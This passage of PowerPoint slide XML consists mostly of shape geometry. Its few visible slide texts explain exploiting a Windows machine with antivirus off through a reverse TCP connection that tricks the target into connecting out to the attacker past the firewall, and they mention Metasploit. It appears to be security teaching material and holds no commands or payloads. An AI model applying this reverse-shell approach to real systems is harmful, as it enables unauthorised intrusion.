                    <a:pt x="234357" y="29162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41887" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113998" y="0"/>
                    <a:pt x="186108" y="0"/>
                    <a:pt x="258217" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284728" y="0"/>
                    <a:pt x="299575" y="14846"/>
                    <a:pt x="299575" y="41887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="112937"/>
                    <a:pt x="299575" y="184517"/>
                    <a:pt x="299575" y="255567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="283138"/>
                    <a:pt x="285789" y="297454"/>
                    <a:pt x="257687" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221632" y="297454"/>
                    <a:pt x="185577" y="297454"/>
                    <a:pt x="149522" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113467" y="297454"/>
                    <a:pt x="77412" y="297454"/>
                    <a:pt x="41357" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14315" y="297454"/>
                    <a:pt x="0" y="283138"/>
                    <a:pt x="0" y="256096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="184517"/>
                    <a:pt x="0" y="112937"/>
                    <a:pt x="0" y="41357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14315"/>
                    <a:pt x="14846" y="0"/>
                    <a:pt x="4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32D70F0-F5AD-417D-A95D-1EBA385A7C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734351" y="1263325"/>
            <a:ext cx="2393093" cy="15388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With Antivirus off, the best way to exploit a Windows System is through Reverse TCP.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3727893" y="1263325"/>
            <a:ext cx="24162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Usually, firewall blocks all incoming connections. Normally, a server will establish a connection with the client, but in this case the target machine will be tricked into establishing a connection to the attacker’s machine (which is allowed by the firewall).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136A6F70-EC0E-44A0-92BC-82B2BEB44690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9151902" y="3174330"/>
            <a:ext cx="687792" cy="883022"/>
            <a:chOff x="3425127" y="0"/>
            <a:chExt cx="5341746" cy="68580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99BCC67-341C-42B6-8A43-DD85BF186024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8AFCEAF-F4F5-4EF4-A7E9-9C9498ACDDF2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97606A-71FB-4B0F-8F14-0903161DE588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038230-1B10-40D1-88FC-2BB96F9ABBB2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FCB2FB4-751A-4CF8-AB19-A88C8FA55DA2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Metasploit&#10;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB04D6E-0C17-EC92-BAE9-04C60C197C5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8" b="19968"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062074" y="3031252"/>
            <a:ext cx="3599514" cy="2161728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647F7-81C3-4EC3-BFB3-8428E4F3F1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Metasploit Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B54230B-DC32-4794-B893-66EF2675E9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1094545" y="1780068"/>
            <a:ext cx="1524196" cy="1956839"/>
            <a:chOff x="3425127" y="0"/>
            <a:chExt cx="5341746" cy="6858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AE73413-725E-407E-A518-BA2ABFA67664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6E26566-759C-47AA-9EC1-1F32C5498C47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0BF009A-D2AB-45D7-BF4D-FF36774E069C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969E853-53BA-4370-8367-45DA0D23F204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42672A-C679-4F0E-841C-B139E1A495E6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4B1972-2BFB-4733-3978-0DC67521B25A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151299" y="3113361"/>
            <a:ext cx="43735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Metasploit Framework provides several powerful tools for exploiting.</a:t>
            </a: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III, Building Scripts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B42B-14CA-4E81-806F-6104B1EFC216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7496004" y="1920263"/>
            <a:ext cx="3864628" cy="3896248"/>
            <a:chOff x="7496004" y="1920263"/>
            <a:chExt cx="3864628" cy="3896248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Isosceles Triangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857AEF3-2BAB-4B10-A92B-50F6B5652C4C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839502" y="4413955"/>
              <a:ext cx="427534" cy="471394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3E9BF2E0-BB0D-492B-B23D-18525C8DC865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7608221" y="2961416"/>
              <a:ext cx="392828" cy="319096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 Same Side Corner Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F874CADC-9EE2-4426-B491-ED504626F9E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="10824557" y="291708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CF6CB40C-AAE3-4BC0-BE1A-A2168066A4DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11062223" y="3784811"/>
              <a:ext cx="285020" cy="285020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24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6FAF72-CA89-49D3-B9C9-BC90661F2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7159" y="2346892"/>
              <a:ext cx="392828" cy="3039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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A45748F-6022-4AD8-BF16-FE4B5FA61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619" y="5355763"/>
              <a:ext cx="372889" cy="259826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2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BD8663-EF58-4C8A-AD10-8B9671E1C8E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2498363">
              <a:off x="8831623" y="1920263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A76A8299-3263-47DF-B0DC-CFD8E87EA586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19470155">
              <a:off x="10110329" y="1972655"/>
              <a:ext cx="132806" cy="502999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2" name="자유형: 도형 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAE9AE7-5A5C-4C0B-A820-235CA68F560D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="9503918" y="5364438"/>
              <a:ext cx="71616" cy="502304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C623668A-E552-4FA0-A1ED-1AFADAD25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073" y="5282722"/>
              <a:ext cx="141778" cy="392828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33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02331B79-8E44-4749-B2E2-C6816EB456CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="9233259" y="1922064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30243713-6F14-4FF0-949D-ABED94C7AA9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8136976" y="5049647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5CB07C1-BE6E-406A-AB6E-734C2C1E8101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9626515" y="1969444"/>
              <a:ext cx="330976" cy="339180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2C0B57BA-B464-44AF-84E3-35CE5FDD7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5361" y="4863776"/>
              <a:ext cx="330939" cy="234666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7D2BFFAC-4745-4323-A6BF-5D92BA1E2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475" y="4673961"/>
              <a:ext cx="330939" cy="330692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ounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52C9B96-B6E8-4A0F-B777-A4F587CA6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9746" y="4139499"/>
              <a:ext cx="330940" cy="232884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66C83CF2-9280-44CE-88E6-50B6B5A58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44" y="5398653"/>
              <a:ext cx="300703" cy="366439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240944" h="3949460">
                  <a:moveTo>
                    <a:pt x="2411668" y="919204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2652037" y="921566"/>
                    <a:pt x="2997179" y="1088232"/>
                    <a:pt x="3147060" y="1333480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2837519" y="1559133"/>
                    <a:pt x="2713715" y="1818123"/>
                    <a:pt x="2716116" y="2148550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2724370" y="2506677"/>
                    <a:pt x="2937416" y="2788602"/>
                    <a:pt x="3240944" y="2908604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3111039" y="3296832"/>
                    <a:pt x="2835874" y="3920800"/>
                    <a:pt x="2360688" y="3949460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104982" y="3948826"/>
                    <a:pt x="1887379" y="3871989"/>
                    <a:pt x="1655487" y="3790391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465920" y="3881513"/>
                    <a:pt x="1178719" y="3984543"/>
                    <a:pt x="936764" y="3932790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634032" y="3867349"/>
                    <a:pt x="33306" y="3304229"/>
                    <a:pt x="0" y="2002921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5122" y="1625861"/>
                    <a:pt x="224231" y="988116"/>
                    <a:pt x="1004287" y="951010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1237754" y="955627"/>
                    <a:pt x="1430737" y="1013358"/>
                    <a:pt x="1654678" y="1150601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1907007" y="1025844"/>
                    <a:pt x="2042657" y="934423"/>
                    <a:pt x="2411668" y="919204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2423572" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2449670" y="236641"/>
                    <a:pt x="2449574" y="370890"/>
                    <a:pt x="2275646" y="605149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098536" y="787863"/>
                    <a:pt x="1909519" y="903902"/>
                    <a:pt x="1627634" y="908022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1601565" y="662380"/>
                    <a:pt x="1689794" y="371496"/>
                    <a:pt x="1823269" y="256823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1945582" y="131527"/>
                    <a:pt x="2156003" y="39571"/>
                    <a:pt x="242357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4A3EBE81-5E07-4BBC-98BC-BA89E0429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500" y="2582839"/>
              <a:ext cx="300170" cy="347427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3319870" h="3842533">
                  <a:moveTo>
                    <a:pt x="579936" y="1296382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="1296382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="2796543"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2739936" y="2962250"/>
                    <a:pt x="2605604" y="3096582"/>
                    <a:pt x="2439897" y="3096582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2272003" y="3729696"/>
                    <a:pt x="2159166" y="3842533"/>
                    <a:pt x="2019975" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1880784" y="3842533"/>
                    <a:pt x="1767947" y="3729696"/>
                    <a:pt x="1767947" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1767947" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1492066" y="3729696"/>
                    <a:pt x="1379229" y="3842533"/>
                    <a:pt x="1240038" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1100847" y="3842533"/>
                    <a:pt x="988010" y="3729696"/>
                    <a:pt x="988010" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="988010" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879975" y="3096582"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="714268" y="3096582"/>
                    <a:pt x="579936" y="2962250"/>
                    <a:pt x="579936" y="2796543"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3067842" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3207033" y="1281925"/>
                    <a:pt x="3319870" y="1394762"/>
                    <a:pt x="3319870" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3319870" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3319870" y="2645088"/>
                    <a:pt x="3207033" y="2757925"/>
                    <a:pt x="3067842" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2928651" y="2757925"/>
                    <a:pt x="2815814" y="2645088"/>
                    <a:pt x="2815814" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2815814" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2815814" y="1394762"/>
                    <a:pt x="2928651" y="1281925"/>
                    <a:pt x="3067842" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="252028" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391219" y="1281925"/>
                    <a:pt x="504056" y="1394762"/>
                    <a:pt x="504056" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="504056" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="504056" y="2645088"/>
                    <a:pt x="391219" y="2757925"/>
                    <a:pt x="252028" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112837" y="2757925"/>
                    <a:pt x="0" y="2645088"/>
                    <a:pt x="0" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1394762"/>
                    <a:pt x="112837" y="1281925"/>
                    <a:pt x="252028" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134062" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2073373" y="558521"/>
                    <a:pt x="2024174" y="607720"/>
                    <a:pt x="2024174" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024174" y="729098"/>
                    <a:pt x="2073373" y="778297"/>
                    <a:pt x="2134062" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194751" y="778297"/>
                    <a:pt x="2243950" y="729098"/>
                    <a:pt x="2243950" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2243950" y="607720"/>
                    <a:pt x="2194751" y="558521"/>
                    <a:pt x="2134062" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1177409" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1116720" y="558521"/>
                    <a:pt x="1067521" y="607720"/>
                    <a:pt x="1067521" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1067521" y="729098"/>
                    <a:pt x="1116720" y="778297"/>
                    <a:pt x="1177409" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1238098" y="778297"/>
                    <a:pt x="1287297" y="729098"/>
                    <a:pt x="1287297" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287297" y="607720"/>
                    <a:pt x="1238098" y="558521"/>
                    <a:pt x="1177409" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1041854" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1215617" y="300965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1350827" y="238508"/>
                    <a:pt x="1501239" y="204386"/>
                    <a:pt x="1659158" y="204272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1823689" y="204153"/>
                    <a:pt x="1980124" y="240963"/>
                    <a:pt x="2119837" y="308065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2297698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2391229" y="54000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215205" y="358882"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507692" y="533629"/>
                    <a:pt x="2710924" y="843756"/>
                    <a:pt x="2737127" y="1206450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018962" y="1206967"/>
                    <a:pt x="1300797" y="1207483"/>
                    <a:pt x="582632" y="1208000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608780" y="838665"/>
                    <a:pt x="818541" y="523565"/>
                    <a:pt x="1119462" y="350420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="948323" y="540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C0C7969F-A090-4D7D-AE69-318914512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5011" y="2518278"/>
              <a:ext cx="340001" cy="338281"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2956013" h="2941055"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B9186B4-3CAE-4B1B-9EE5-82556E22D24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45251" y="2251006"/>
              <a:ext cx="441966" cy="281210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AE4B125-6999-45DF-B3C8-56A855BA5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273" y="3365017"/>
              <a:ext cx="357359" cy="364685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3860876" h="3940019">
                  <a:moveTo>
                    <a:pt x="3248876" y="1942264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="1942264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="2090815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859023" y="2090815"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3817225" y="2949620"/>
                    <a:pt x="3215273" y="3679864"/>
                    <a:pt x="2378197" y="3884304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2219818" y="3922985"/>
                    <a:pt x="2060231" y="3941082"/>
                    <a:pt x="1902626" y="3939971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1286982" y="3935631"/>
                    <a:pt x="701577" y="3638194"/>
                    <a:pt x="337583" y="3128887"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30667" y="3435803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30667" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124425" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781340" y="2685130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1079782" y="3180935"/>
                    <a:pt x="1667379" y="3425841"/>
                    <a:pt x="2232517" y="3287817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2810639" y="3146622"/>
                    <a:pt x="3224897" y="2638979"/>
                    <a:pt x="3247291" y="2044286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3248876" y="2044345"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1958249" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2573893" y="4388"/>
                    <a:pt x="3159298" y="301825"/>
                    <a:pt x="3523293" y="811132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="504216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736450" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079535" y="1254889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2781093" y="759084"/>
                    <a:pt x="2193496" y="514178"/>
                    <a:pt x="1628358" y="652202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050236" y="793397"/>
                    <a:pt x="635978" y="1301040"/>
                    <a:pt x="613584" y="1895733"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1895674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1837407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787" y="1837407"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="49183" y="983705"/>
                    <a:pt x="649445" y="259216"/>
                    <a:pt x="1482678" y="55715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1641057" y="17034"/>
                    <a:pt x="1800644" y="-1063"/>
                    <a:pt x="195824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16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F6F3B5-823E-442B-809C-F7DFF41F2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8038" y="5418963"/>
              <a:ext cx="353455" cy="397548"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1376433 w 2765122"/>
                <a:gd name="connsiteY0" fmla="*/ 2257187 h 3110058"/>
                <a:gd name="connsiteX1" fmla="*/ 1145400 w 2765122"/>
                <a:gd name="connsiteY1" fmla="*/ 2354829 h 3110058"/>
                <a:gd name="connsiteX2" fmla="*/ 1036105 w 2765122"/>
                <a:gd name="connsiteY2" fmla="*/ 2389775 h 3110058"/>
                <a:gd name="connsiteX3" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY3" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX4" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY4" fmla="*/ 2894301 h 3110058"/>
                <a:gd name="connsiteX5" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY5" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX6" fmla="*/ 1726723 w 2765122"/>
                <a:gd name="connsiteY6" fmla="*/ 2399874 h 3110058"/>
                <a:gd name="connsiteX7" fmla="*/ 1605728 w 2765122"/>
                <a:gd name="connsiteY7" fmla="*/ 2358846 h 3110058"/>
                <a:gd name="connsiteX8" fmla="*/ 1795887 w 2765122"/>
                <a:gd name="connsiteY8" fmla="*/ 2033026 h 3110058"/>
                <a:gd name="connsiteX9" fmla="*/ 1694075 w 2765122"/>
                <a:gd name="connsiteY9" fmla="*/ 2094586 h 3110058"/>
                <a:gd name="connsiteX10" fmla="*/ 1578650 w 2765122"/>
                <a:gd name="connsiteY10" fmla="*/ 2155153 h 3110058"/>
                <a:gd name="connsiteX11" fmla="*/ 1618821 w 2765122"/>
                <a:gd name="connsiteY11" fmla="*/ 2173994 h 3110058"/>
                <a:gd name="connsiteX12" fmla="*/ 1763952 w 2765122"/>
                <a:gd name="connsiteY12" fmla="*/ 2229138 h 3110058"/>
                <a:gd name="connsiteX13" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY13" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX14" fmla="*/ 969005 w 2765122"/>
                <a:gd name="connsiteY14" fmla="*/ 2030800 h 3110058"/>
                <a:gd name="connsiteX15" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY15" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX16" fmla="*/ 997942 w 2765122"/>
                <a:gd name="connsiteY16" fmla="*/ 2219324 h 3110058"/>
                <a:gd name="connsiteX17" fmla="*/ 1135534 w 2765122"/>
                <a:gd name="connsiteY17" fmla="*/ 2169774 h 3110058"/>
                <a:gd name="connsiteX18" fmla="*/ 1176026 w 2765122"/>
                <a:gd name="connsiteY18" fmla="*/ 2151638 h 3110058"/>
                <a:gd name="connsiteX19" fmla="*/ 1061678 w 2765122"/>
                <a:gd name="connsiteY19" fmla="*/ 2089068 h 3110058"/>
                <a:gd name="connsiteX20" fmla="*/ 2270995 w 2765122"/>
                <a:gd name="connsiteY20" fmla="*/ 1682607 h 3110058"/>
                <a:gd name="connsiteX21" fmla="*/ 2193789 w 2765122"/>
                <a:gd name="connsiteY21" fmla="*/ 1749541 h 3110058"/>
                <a:gd name="connsiteX22" fmla="*/ 2080535 w 2765122"/>
                <a:gd name="connsiteY22" fmla="*/ 1839120 h 3110058"/>
                <a:gd name="connsiteX23" fmla="*/ 1988274 w 2765122"/>
                <a:gd name="connsiteY23" fmla="*/ 1905861 h 3110058"/>
                <a:gd name="connsiteX24" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY24" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX25" fmla="*/ 1929983 w 2765122"/>
                <a:gd name="connsiteY25" fmla="*/ 2282840 h 3110058"/>
                <a:gd name="connsiteX26" fmla="*/ 2032699 w 2765122"/>
